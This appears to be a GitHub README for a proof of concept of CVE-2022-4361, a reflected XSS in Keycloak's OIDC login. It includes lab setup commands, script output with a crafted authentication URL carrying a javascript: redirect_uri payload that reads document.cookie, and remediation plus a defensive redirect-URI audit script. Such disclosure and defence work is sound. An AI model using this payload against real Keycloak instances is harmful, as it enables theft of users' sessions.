# CVE-2022-4361
## Description
This repository contains a PoC for [CVE-2022-4361](https://nvd.nist.gov/vuln/detail/CVE-2022-4361). <br>
All credits go to the original author of the discovery, [mulliken](https://bugzilla.redhat.com/show_bug.cgi?id=2151618).
**IMPORTANT**: this PoC is not complete, as it does not cover the `AssertionConsumerServiceURL` parameter of the SAML authentication protocol. Currently, only the OIDC case is covered.
## Steps
1. Clone this repo.
```shell
git clone https://github.com/faccimatteo/CVE-2022-4361.git && cd ./CVE-2022-4361
```
2. Set up a vulnerable Keycloak version using Docker Compose.
```shell
docker compose up -d
```
Wait until the infrastructure is available and reachable.
Since in this PoC Keycloak is not integrated with any web application, the full Keycloak authentication URL must be passed to the script (once the test realm has been correctly set up).
The vulnerability can be tested on this environment with the following command; the lines after it are the output of a successful run.
```shell
python3 ./CVE-2022-4361.py --url http://localhost:8080/realms/test-realm/protocol/openid-connect/auth\?client_id\=test-client\&redirect_uri\=http%3A%2F%2Flocalhost%3A8080%2Frealms%2Ftest-realm%2Faccount%2F%23%2F\&state\=f0cd8010-72b1-476d-823a-b72e2106db1d\&response_mode\=fragment\&response_type\=code\&scope\=openid\&nonce\=eb117e13-b09e-49b1-a086-3ebb69d6ca3d\&code_challenge\=NhJQK3qf9T_85Rj0aYg2JbUm3Df23m1ZG3q1goqwU8w\&code_challenge_method\=S256
[+] Detected Keycloak OIDC configuration in the authentication flow for http://localhost:8080/realms/test-realm/protocol/openid-connect/auth?client_id=test-client&redirect_uri=http%3A%2F%2Flocalhost%3A8080%2Frealms%2Ftest-realm%2Faccount%2F%23%2F&state=f0cd8010-72b1-476d-823a-b72e2106db1d&response_mode=fragment&response_type=code&scope=openid&nonce=eb117e13-b09e-49b1-a086-3ebb69d6ca3d&code_challenge=NhJQK3qf9T_85Rj0aYg2JbUm3Df23m1ZG3q1goqwU8w&code_challenge_method=S256.
[+] Crafted malicious Keycloak authentication URL: http://localhost:8080/realms/test-realm/protocol/openid-connect/auth?client_id=test-client&redirect_uri=javascript:confirm(document.cookie)&state=f0cd8010-72b1-476d-823a-b72e2106db1d&response_mode=form_post&response_type=code&scope=openid&nonce=eb117e13-b09e-49b1-a086-3ebb69d6ca3d&code_challenge=NhJQK3qf9T_85Rj0aYg2JbUm3Df23m1ZG3q1goqwU8w&code_challenge_method=S256
[+] The Keycloak instance used by the target is likely to be VULNERABLE to CVE-2022-4361!
[*] Opening malicious login page in your default web browser...
```
A browser window opens on the tampered login page (screenshot: `img/tampered-login-page.png`).

Once a victim provides valid credentials (available in `keycloak-config/test-realm.json`) and clicks the `Sign In` button, the reflected XSS payload is delivered (screenshot: `img/xss-delivered.png`). <br>
Note that the attack succeeds even if the victim is already logged into the application.

## Remediation
- Upgrade Keycloak to a version > 21.1.1.
- Never configure the wildcard `*` as a valid redirect URI (`redirect_uri`) for a client in production environments.
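As an added defensive example (not part of this repository and not Keycloak's own code), the Python below shows the two checks a defender would want around this bug: an audit of a realm export for clients whose valid redirect URIs are wildcarded, and an allow-list check in the spirit of the fix that rejects any `redirect_uri` that is not an absolute `http(s)` URL matching a configured pattern. The realm fragment is constructed for the example and is not the repository's `keycloak-config/test-realm.json`; the function names are illustrative.

```python
import json
from urllib.parse import urlsplit

# Constructed realm export fragment (same shape as a Keycloak realm JSON,
# but NOT the repository's keycloak-config/test-realm.json).
SAMPLE_REALM = json.loads("""
{
  "realm": "example-realm",
  "clients": [
    {"clientId": "wide-open-client",   "redirectUris": ["*"]},
    {"clientId": "scheme-less-client", "redirectUris": ["*://app.example.test/*"]},
    {"clientId": "tight-client",       "redirectUris": ["https://app.example.test/callback",
                                                        "https://app.example.test/oidc/*"]}
  ]
}
""")

ALLOWED_SCHEMES = {"http", "https"}


def overly_broad(pattern: str) -> bool:
    """True if a 'Valid Redirect URIs' entry effectively accepts any destination:
    a bare '*', a wildcarded scheme or host, or a non-URL scheme (e.g. javascript:)."""
    p = pattern.strip()
    if p == "*":
        return True
    scheme, _, rest = p.partition("://")
    if not rest:
        # No "scheme://" part: a relative pattern (resolved against the client's
        # root URL) is fine unless it starts with the wildcard or smuggles a scheme.
        head = p.split("/", 1)[0]
        return p.startswith("*") or ":" in head
    return scheme.lower() not in ALLOWED_SCHEMES or rest.startswith("*")


def audit_realm(realm: dict) -> list:
    """Return (clientId, offending pattern) pairs for every risky redirect entry."""
    findings = []
    for client in realm.get("clients", []):
        for pattern in client.get("redirectUris", []):
            if overly_broad(pattern):
                findings.append((client["clientId"], pattern))
    return findings


def is_acceptable_redirect(redirect_uri: str, valid_patterns: list) -> bool:
    """Illustrative server-side check (not Keycloak's implementation):
    redirect_uri (already URL-decoded by the query parser) must be an absolute
    http(s) URL with a host, and must match one configured pattern exactly or
    by prefix when the pattern ends in '*'. Broad patterns authorise nothing."""
    parts = urlsplit(redirect_uri)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return False  # rejects javascript:, data:, relative and scheme-less values
    for pattern in valid_patterns:
        if overly_broad(pattern):
            continue
        if pattern.endswith("*"):
            if redirect_uri.startswith(pattern[:-1]):
                return True
        elif redirect_uri == pattern:
            return True
    return False


if __name__ == "__main__":
    for client_id, pattern in audit_realm(SAMPLE_REALM):
        print(f"[!] client {client_id!r} has an overly broad redirect URI: {pattern!r}")
    good = "https://app.example.test/oidc/cb"
    bad = "javascript:confirm(document.cookie)"
    print(is_acceptable_redirect(good, ["https://app.example.test/oidc/*"]))  # True
    print(is_acceptable_redirect(bad, ["https://app.example.test/oidc/*"]))   # False
```

Run the audit against a realm export taken with `kc.sh export` (or the admin console) to find clients that would have been exposed, and note that the check deliberately refuses to let a `*` entry authorise anything: the wildcard is treated as a misconfiguration rather than as "allow all".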
## TODO
Currently, this PoC only covers the case of Keycloak being configured with an OIDC authentication flow. <br>
Support for the SAML authentication protocol will be added in a future release.
## Repository layout
```text
.
├── CVE-2022-4361.py
├── docker-compose.yaml
├── img
│   ├── tampered-login-page.png
│   └── xss-delivered.png
├── keycloak-config
│   └── test-realm.json
├── LICENSE
└── README.md

3 directories, 7 files
```